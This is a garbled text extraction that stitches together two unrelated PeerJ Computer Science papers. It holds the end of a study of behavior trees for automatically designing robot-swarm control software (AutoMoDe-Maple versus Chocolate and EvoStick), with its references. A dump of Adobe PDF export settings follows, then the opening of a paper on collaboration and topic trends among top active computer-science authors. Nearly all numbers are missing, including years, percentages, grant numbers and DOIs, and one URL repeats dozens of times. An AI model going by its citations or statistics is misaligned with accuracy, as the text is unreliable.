reality against chocolate and evostick, an evolutionary swarm robotics method. in the second study, we investigated the effect of the design budget on maple and chocolate. in the third study, we explored different variants of maple’s control architecture. our main findings are the following. (a) the results show that maple is robust to the reality gap. indeed, maple and chocolate performed similarly, and they suffered from a reduced performance drop with respect to evostick. these results confirm francesca et al. ( ) conjecture that automode is robust to the reality gap due to its modular nature. they also indicate that the architecture into which the predefined modules are combined is a secondary issue. (b) the study on the effect of the design budget has shown that: (i) the restrictions on the structure of maple’s behavior trees inhibit its expressiveness, indeed, for foraging, maple is unable to express some efficient solution that chocolate could generate; (ii) maple converges to efficient solutions faster than chocolate because of the smaller search space. the restrictions of maple, imposed by the absence of natural termination criteria in the low-level behaviors adopted, appear to be a double-edged sword: they facilitate the initial search for efficient solutions, but curb the expressiveness of behavior trees. when adopting the low-level behaviors of chocolate, none of the variants considered outperformed maple in both missions. overall, our three studies indicate that behavior trees can be used in the particular context of swarm robotics in which low-level behaviors typically do not have a natural termination criterion. however, they also suggest that behavior trees only offer a benefit over probabilistic finite state machines when the design budget is small. future work could develop along two avenues. the first one could be dedicated to further investigate the use of vanilla’s and chocolate’s low-level behaviors as action nodes of behavior trees. for example, the control software generated by maple with different design budgets could be assessed in robot experiments. the same holds for control software generated by maple’s variants. also, further variants could be explored by relaxing the restrictions on the number of levels, branches, and leaves. for the relevant ones, the effect of the design budget could be investigated. as a second avenue, future work could be devoted to developing an ad-hoc optimization algorithm that takes advantage ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the inherent modularity of behavior trees. local search algorithms, such as iterative improvement and simulated annealing, have shown to be promising algorithms for the automatic modular design of swarm behaviors (kuckling, ubeda arriaza & birattari, ; kuckling, stützle & birattari, ) and could serve as starting points. additional information and declarations funding the project has received funding from the european research council (erc) under the european union’s horizon research and innovation program (grant agreement no. ). mauro birattari and jonas kuckling received support from the belgian fonds de la recherche scientifique—fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: the project has received funding from the european research council (erc) under the european union’s horizon research and innovation program (grant agreement no ). mauro birattari and jonas kuckling received support from the belgian fonds de la recherche scientifique—fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. competing interests mauro birattari is an academic editor for peerj. author contributions � antoine ligot conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � jonas kuckling conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � darko bozhinoski conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � mauro birattari conceived and designed the experiments, authored or reviewed drafts of the paper, directed the research, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available in the supplemental files and at iridia: http://iridia.ulb.ac.be/supp/iridiasupp - /index.html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://iridia.ulb.ac.be/supp/iridiasupp - /index.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references bagnell ja, cavalcanti f, cui l, galluzzo t, hebert m, kazemi m, klingensmith m, libby j, liu ty, pollard n, pivtoraiko m, valois j-s, zhu r. . an integrated system for autonomous robotics manipulation. in: ieee/rsj international conference on intelligent robots and systems, iros, piscataway: ieee, – . balaprakash p, birattari m, stützle t. . improvement strategies for the f-race algorithm: sampling design and iterative refinement. in: bartz-beielstein t, blesa mj, blum c, naujoks b, roli a, rudolph g, sampels m, eds. hybrid metaheuristics, th international workshop, hm . vol. . berlin: springer, – . beni g. . from swarm intelligence to swarm robotics. in: Şahin e, spears wm, eds. swarm robotics, sab. vol. . berlin: springer, – . birattari m, ligot a, bozhinoski d, brambilla m, francesca g, garattoni l, garzón ramos d, hasselmann k, kegeleirs m, kuckling j, pagnozzi f, roli a, salman m, stützle t. . automatic off-line design of robot swarms: a manifesto. frontiers in robotics and ai : doi . /frobt. . . birattari m, ligot a, hasselmann k. . disentangling automatic and semi-automatic approaches to the optimization-based design of control software for robot swarms. nature machine intelligence ( ): – doi . /s - - - . bozhinoski d, birattari m. . designing control software for robot swarms: software engineering for the development of automatic design methods. in: proceedings of the st international workshop on robotics software engineering, rose, new york: acm, – . brambilla m, ferrante e, birattari m, dorigo m. . swarm robotics: a review from the swarm engineering perspective. swarm intelligence ( ): – doi . /s - - - . brooks ra. . a robust layered control system for a mobile robot. ieee journal on robotics and automation ( ): – doi . /jra. . . brooks ra. . intelligence without representation. artificial intelligence ( – ): – doi . / - ( ) -m. brooks ra. . artificial life and real robots. in: varela fj, bourgine p, eds. towards a practice of autonomous systems. proceedings of the first european conference on artificial life. cambridge: mit press, – . bäck t, fogel db, michalewicz z. . handbook of evolutionary computation. first. bristol: iop publishing ltd. champandard aj. . understanding behavior trees. available at http://aigamedev.com/open/ articles/bt-overview/. champandard aj, dawe m, hernandez-cerpa d. . behavior trees: three ways of cultivating game ai. game developers conference, ai summit. available at https://www.gdcvault.com/ play/ /behavior-trees-three-ways-of. christensen al, dorigo m. . evolving an integrated phototaxis and hole-avoidance behavior for a swarm-bot. in: rocha lm, yaeger ls, bedau ma, floreano d, goldstone rl, vespignani a, eds. artificial life x: proceedings of the tenth international conference on the simulation and synthesis of living systems. cambridge: mit press. a bradford book, – . colledanchise m, Ögren p. . behavior trees in robotics and ai: an introduction. first edition. boca raton: crc press. conover wj. . practical nonparametric statistics. third edition. new york: john wiley & sons. dorigo m, birattari m, brambilla m. . swarm robotics. scholarpedia ( ): doi . /scholarpedia. . ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /frobt. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jra. . http://dx.doi.org/ . / - ( ) -m http://aigamedev.com/open/articles/bt-overview/ http://aigamedev.com/open/articles/bt-overview/ https://www.gdcvault.com/play/ /behavior-trees-three-ways-of https://www.gdcvault.com/play/ /behavior-trees-three-ways-of http://dx.doi.org/ . /scholarpedia. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ floreano d, husbands p, nolfi s. . evolutionary robotics. first. berlin, heidelberg: springer handbook of robotics, springer handbooks, – . francesca g, birattari m. . automatic design of robot swarms: achievements and challenges. frontiers in robotics and ai ( ): – doi . /frobt. . . francesca g, brambilla m, brutschy a, garattoni l, miletitch r, podevijn g, reina a, soleymani t, salvaro m, pinciroli c, mascia f, trianni v, birattari m. . automode-chocolate: automatic design of control software for robot swarms. swarm intelligence ( – ): – doi . /s - - - . francesca g, brambilla m, brutschy a, trianni v, birattari m. . automode: a novel approach to the automatic design of control software for robot swarms. swarm intelligence ( ): – doi . /s - - - . friedman m. . the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association ( ): – doi . / . . . friedman m. . a correction: the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association ( ): . garattoni l, birattari m. . swarm robotics. in: webster jg, ed. wiley encyclopedia of electrical and electronics engineering. hoboken: john wiley & sons, – . garattoni l, francesca g, brutschy a, pinciroli c, birattari m. . software infrastructure for e-puck (and tam). technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf. garzón ramos d, birattari m. . automatic design of collective behaviors for robots that can display and perceive colors. applied sciences ( ): doi . /app . geman s, bienenstock e, doursat r. . neural networks and the bias/variance dilemma. neural computation ( ): – doi . /neco. . . . . gutiérrez Á, campo a, dorigo m, donate j, monasterio-huelin f, magdalena l. . open e- puck range & bearing miniaturized board for local communication in swarm robotics. in: kosuge k, ed. ieee international conference on robotics and automation, icra. piscataway: ieee, – . hasselmann k, ligot a, francesca g, birattari m. . reference models for automode. technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf. hasselmann k, robert f, birattari m. . automatic design of communication-based behaviors for robot swarms. in: dorigo m, birattari m, garnier s, hamann h, montes de oca m, solnon c, stützle t, eds. swarm intelligence—ants. vol. . cham: springer, – . hauert s, zufferey j-c, floreano d. . evolved swarming without positioning information: an application in aerial communication relay. autonomous robots ( ): – doi . /s - - - . hu d, gong y, hannaford b, seibel ej. . semi-autonomous simulated brain tumor ablation with ravenii surgical robot using behavior tree. in: ieee international conference on robotics and automation, icra, piscataway: ieee, – . isla d. . handling complexity in the halo ai. in: game developers conference, vol. . jakobi n, husbands p, harvey i. . noise and the reality gap: the use of simulation in evolutionary robotics. in: morán f, moreno a, merelo jj, chacón p, eds. advances in artificial life: third european conference on artificial life. vol. . berlin: springer, – . ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /frobt. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://dx.doi.org/ . /app http://dx.doi.org/ . /neco. . . . http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jones s, studley m, hauert s, winfield a. . evolving behaviour trees for swarm robotics. in: groß r, kolling a, berman s, frazzoli e, martinoli a, matsuno f, gauci m, eds. distributed autonomous robotic systems (dars). vol. . cham: springer, – . jones s, winfield a, hauert s, studley m. . onboard evolution of understandable swarm behaviors. advanced intelligent systems ( ): doi . /aisy. . kuckling j, ligot a, bozhinoski d, birattari m. a. behavior trees as a control architecture in the automatic modular design of robot swarms. in: dorigo m, birattari m, blum c, christensen al, reina a, trianni v, eds. swarm intelligence—ants. vol. . cham: springer, – . kuckling j, ligot a, bozhinoski d, birattari m. b. search space for automode-chocolate and automode-maple. technical report tr/iridia/ - , iridia, université libre de bruxelles, brussels, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf. kuckling j, stützle t, birattari m. . iterative improvement in the automatic modular design of robot swarms. peerj computer science (in press). kuckling j, ubeda arriaza k, birattari m. . simulated annealing as an optimization algorithm in the automatic modular design of robot swarms. in: beuls k, bogaerts b, bontempi g, geurts p, harley n, lebichot b, lenaerts t, gilles l, van eecke p, eds. proceedings of the reference ai & ml conference for belgium, netherlands & luxemburg, bnaic/ benelearn . vol. . aachen: ceur workshop proceedings. ligot a, birattari m. . on mimicking the effects of the reality gap with simulation-only experiments. in: dorigo m, birattari m, garnier s, hamann h, montes de oca m, solnon c, stützle t, eds. swarm intelligence—ants. vol. . cham: springer, – . ligot a, birattari m. . simulation-only experiments to mimic the effects of the reality gap in the automatic design of robot swarms. swarm intelligence ( ): – doi . /s - - -w. ligot a, kuckling j, bozhinoski d, birattari m. . automatic modular design of robot swarms using behavior trees as a control architecture. available at http://iridia.ulb.ac.be/supp/ iridiasupp - /index.html. lim c-u, baumgarten r, colton s. . evolving behaviour trees for the commercial game defcon. in: di chio c, cagnoni s, cotta c, ebner m, ekárt a, esparcia-alcázar ai, goh c-k, merelo jj, neri f, preuss m, togelius j, yannakakis gn, eds. applications of evolutionary computation. vol. . berlin: springer, – . lipson h. . evolutionary robotics and open-ended design automation. in: bar-cohen y, ed. biomimetics: biologically inspired technologies. vol. . boca raton: crc press, – . lópez-ibáñez m, dubois-lacoste j, pérez cáceres l, birattari m, stützle t. . the irace package: iterated racing for automatic algorithm configuration. operations research perspectives : – doi . /j.orp. . . . marzinotto a, colledanchise m, smith c, Ögren p. . towards a unified behavior trees framework for robot control. in: ieee international conference on robotics and automation, icra, piscataway: ieee, – . mondada f, bonani m, raemy x, pugh j, cianci c, klaptocz a, magnenat s, zufferey j-c, floreano d, martinoli a. . the e-puck, a robot designed for education in engineering. in: gonçalves p, torres p, alves c, eds. proceedings of the th conference on autonomous robot systems and competitions. castelo branco: instituto politécnico de castelo branco, – . nehaniv cl, dautenhahn k. . imitation in animals and artifacts. first edition. cambridge: mit press. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /aisy. http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://dx.doi.org/ . /s - - -w http://iridia.ulb.ac.be/supp/iridiasupp - /index.html http://iridia.ulb.ac.be/supp/iridiasupp - /index.html http://dx.doi.org/ . /j.orp. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ neupane a, goodrich m. . learning swarm behaviors using grammatical evolution and behavior trees. in: kraus s, ed. twenty-eighth international joint conference on artificial intelligence (ijcai- ). ijcai, – . Ögren p. . increasing modularity of uav control systems using computer game behavior trees. in: thienel j, ed. aiaa guidance, navigation, and control conference . reston: aiaa meeting papers, – . paxton c, hundt a, jonathan f, guerin k, hager gd. . costar: instructing collaborative robots with behavior trees and vision. in: ieee international conference on robotics and automation, icra, piscataway: ieee, – . perez d, nicolau m, o’neill m, brabazon a. . evolving behaviour trees for the mario ai competition using grammatical evolution. in: di chio c, cagnoni s, cotta c, ebner m, ekárt a, esparcia-alcázar ai, merelo jj, neri f, preuss m, richter h, togelius j, yannakakis gn, eds. applications of evolutionary computation, volume of lecture notes in computer science. berlin: springer, – . pinciroli c, trianni v, o’grady r, pini g, brutschy a, brambilla m, mathews n, ferrante e, di caro ga, ducatelle f, birattari m, gambardella lm, dorigo m. . argos: a modular, parallel, multi-engine simulator for multi-robot systems. swarm intelligence ( ): – doi . /s - - - . quinn m, smith l, mayley g, husbands p. . evolving controllers for a homogeneous system of physical robots: structured cooperation with minimal sensors. philosophical transactions of the royal society of london. series a: mathematical, physical and engineering sciences ( ): – doi . /rsta. . . Şahin e. . swarm robotics: from sources of inspiration to domains of application. in: Şahin e, spears wm, eds. swarm robotics, sab. vol. . berlin: springer, – . salman m, ligot a, birattari m. . concurrent design of control software and configuration of hardware for robot swarms under economic constraints. peerj computer science ( ):e doi . /peerj-cs. . silva f, duarte m, correia l, oliveira sm, christensen al. . open issues in evolutionary robotics. evolutionary computation ( ): – doi . /evco_a_ . spaey g, kegeleirs m, garzón ramos d, birattari m. . comparison of different exploration schemes in the automatic modular design of robot swarms. in: beuls k, bogaerts b, bontempi g, geurts p, harley n, lebichot b, lenaerts t, gilles l, van eecke p, eds. proceedings of the reference ai & ml conference for belgium, netherlands & luxemburg, bnaic/benelearn . vol. . aachen: ceur workshop proceedings. spears wm, spears d, hamann jc, heil r. . distributed, physics-based control of swarms of vehicles. autonomous robots ( ): – doi . /b:auro. . .f . stranieri a, turgut ae, salvaro m, garattoni l, francesca g, reina a, dorigo m, birattari m. . iridia’s arena tracking system. technical report tr/iridia/ - , iridia, université libre de bruxelles, belgium. available at http://iridia.ulb.ac.be/iridiatrseries/link/ iridiatr - .pdf. trianni v. . evolutionary swarm robotics. berlin: springer. trianni v. . evolutionary robotics: model or design? frontiers in robotics and ai : doi . /frobt. . . trianni v, nolfi s. . self-organizing sync in a robotic swarm: a dynamical system view. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /evco_a_ http://dx.doi.org/ . /b:auro. . .f http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://iridia.ulb.ac.be/iridiatrseries/link/iridiatr - .pdf http://dx.doi.org/ . /frobt. . http://dx.doi.org/ . /tevc. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. automatic modular design of robot swarms using behavior trees as a control architecture introduction automode&#x ;maple experimental setup study : performance in simulation and reality study : performance versus design budget study : maple and some of its possible variants results related work conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice research collaboration and topic trends in computer science based on top active authors submitted august accepted december published january corresponding author dah ming chiu, dmchiu@ie.cuhk.edu.hk academic editor luciano sánchez additional information and declarations can be found on page doi . /peerj-cs. copyright wu et al. distributed under creative commons cc-by . open access research collaboration and topic trends in computer science based on top active authors yan wu , srinivasan venkatramanan and dah ming chiu department of information engineering, the chinese university of hong kong, hong kong virginia bioinformatics institute, virginia polytechnic institute and state university (virginia tech), united states abstract academic publication metadata can be used to analyze the collaboration, productivity and hot topic trends of a research community. in this paper, we study a specific group of authors, namely the top active authors. they are defined as the top % authors with uninterrupted and continuous presence in scientific publications over a time window. we take the top active authors in the computer science (cs) community over different time windows in the past years, and use them to analyze collaboration, productivity and topic trends. we show that (a) the top active authors are representative of the overall population; (b) the community is increasingly moving in the direction of team research, with increased level and degree of collaboration; and (c) the research topics are increasingly inter-related. by focusing on the top active authors, it helps visualize these trends better. besides, the observations from top active authors also shed light on design of better evaluation framework and resource management for policy makers in academia. subjects data mining and machine learning, data science, digital libraries, network science and online social networks, social computing keywords top active author, research collaboration, topic trends introduction as a research field established in the s (brookshear, ), computer science has gone through rapid development and become a mature field. much can be learned about the de- velopments and trends in computer science by analyzing the publication metadata. in this study, we take a particular approach, by focusing on analyzing the top active authors in the field. we define top active authors to be the % authors with uninterrupted and contin- uous presence in scientific publications over a time window. the definition of top active authors is based on the term “ucp author”, which was defined by ioannidis, boyack & kla- vans ( ) in their study of publication metadata obtained from scopus in a specific time window of years. during the period from to , they noted that the number of authors who published papers every year without gap amounts to about % of all authors; and these ucp authors coauthored a much larger percentage of papers and amassed a high percentage of the total citations, compared to the average researcher. therefore, we might treat top active authors as the core of the community for the given time window. by analyz- ing their activities, we may get insights into the major trends of the whole community. how to cite this article wu et al. ( ), research collaboration and topic trends in computer science based on top active authors. peerj comput. sci. :e ; doi . /peerj-cs. mailto:dmchiu@ie.cuhk.edu.hk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in our study, we further explore the nature and extent of collaborative efforts by the top active authors in comparison with average authors. recently, it was pointed out by wuchty, jones & uzzi ( ) that “team science” is an important trend in how research is carried out. the phenomenon is manifested in the steady increase in the number of coauthors per paper. since this trend exists not only in science but also in other research fields, we can refer to it as “team research”. the “team” in team research may correspond to an organized group within an organization (a research lab), or collaborative partnership between researchers in different organizations and countries. from the collaboration patterns of top active authors, we can get more insights about team research, in particular its relation to research productivity. besides, by observing the research topics that top active authors are working on, we can also get a sense of the general research topic trends in the whole community. our goal goes beyond simple data analysis in this work. we hope the observations from top active authors can not only show the general trends in doing research in the academic community, but also provide insights for policy researchers and policy makers in academia. for example, the comparison between top active authors and average authors might shed light on the shortcomings of current author evaluation framework, and help develop different evaluation metrics for different author types. and the general trends in research collaboration and topic may also help policy makers adjust resource allocations at different periods and do better resource management. related work research collaboration has been long studied in the scientometrics field. for example, katz ( ) examined the geographical effects on intra-national scientific collaboration and demonstrated that research collaboration decreases exponentially with the distance sepa- rating the collaborative partners. wagner & leydesdorff ( ) showed that international collaboration is a self-organizing network, and its growth can be explained based on the organizing principle of preferential attachment. there are also a lot of works focusing on the statistically significant increase in the amount of research collaboration in this field. for example, o’brien ( ) showed the overall increase in the number of coauthored articles in the literature; wuchty, jones & uzzi ( ) coined the term “team science” and showed the increasing dominance of team science in the production of knowledge; and uddin, hossain & rasmussen ( ) studied the network effects on authors’ collaboration behaviors. the authors’ research collaboration behavior also attracted attentions from researchers studying networks, and most of the studies were based on the classic work from newman ( ). he treated the coauthor network as a special example of a social network and studied the structural properties of such a network. researchers have also studied the structural evolution of a collaboration network. for instance, kunegis, fay & bauckhage ( ) analyzed the eigenvector evolution of the coauthor network and proposed a spectral evolution model to show the change of coauthor structures; huang et al. ( ) proposed a stochastic poisson model with optimization tree, which can efficiently predict wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the increment of collaboration based on local neighborhood structure; pan & saramäki ( ) and ke & ahn ( ) studied the relationship between tie strength and network topology in coauthor network and found its difference with social networks in general. besides, research collaboration has always been an important component when considering policies towards research. many works focusing on research policy studies have tried to evaluate the efficiency of resource management in system based on researchers’ collaboration behavior. classic works in this field include katz & martin ( ), where the authors studied research collaboration at different levels and argued for a more symmetrical approach in comparing the costs of collaboration with the benefits; and lee & bozeman ( ), where the authors investigated the impact of research collaboration on scientific productivity and showed the different impacts at individual level and community level. they also proposed considering collaborations in terms of the extent to which resources fit research needs. there are also works based on surveys of individual researchers’ opinions on research collaboration such as melin ( ), where the author suggested that research policy should provide financial and organizational possibilities for the researchers to establish joint ventures and also fund projects on a team or network basis. another group of papers related to our work studied the factors that may influence productivity or authors’ research behavior. for example, gingras et al. ( ) showed the effects of aging on researchers’ publication patterns and described researchers’ publication style during different stages of career. petersen et al. ( ) found the existence of the matthew effect in academic publishing, which may favor senior and experienced researchers. finally, ioannidis, boyack & klavans ( ) was the first to introduce the notion of uninterrupted and continuous presence as a way to identify a set of core authors in a research community, and showed the dominance of these authors in the production of academic outputs. most of the previous works (except ioannidis, boyack & klavans ( )) analyze the entire population of a community. by focusing on top active authors, which is a much smaller, but important and representative subset of the overall population, we are able to find more results about trends in research collaboration (team research), its relationship to research productivity, and the evolution of research topics and focus as well. materials & methods our data is collected from microsoft academic search (mas) (http://academic.research. microsoft.com/). mas gathers bibliographic information from the principal scientific publishing services covering papers from to present, and uses its own classification scheme based on research fields and more than subdomains to classify different papers (orduña-malea et al., ). for example, the fields include computer science, physics, and mathematics, and papers in the computer science field can be further categorized into subdomains such as “databases”, “machine learning and pattern recognition”, “networks and communications” and so on. each paper is labelled with some papers are only classified as computer science papers, but not categorized into any subdomain. a unique numerical id; its metadata includes paper title, author list, publication year, wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://dx.doi.org/ . /peerj-cs. table dataset description. field coverage computer science time coverage (year) – #papers , , #authors , , #paper-author mapping links , , publication venue and a reference list. likewise, authors are maintained as another type of object. each author is labelled with a unique numerical id as well; its metadata includes current affiliation and publication history. an author’s research field and research subdomains in that field can be obtained from his publication history. we choose the computer science field, which seems most complete (and we are most familiar with) for a case study in this paper. the same methodology can be applied to data from other sources, pertaining to other scientific disciplines. based on the mapping information of papers and authors, we can obtain the detailed evolution trend of author collaboration and author productivity for both top active authors and average authors. this can show us the general trend in the community as a whole, and also the difference between top active authors and average authors. besides, since our metadata comes with classification of each paper into a research subdomain in computer science, it is possible to tell the subdomains each top active author works in. given the moderate size for the set of all top active authors, it is possible to apply graph clustering algorithms to find the collaboration clusters for top active authors in computer science over time, 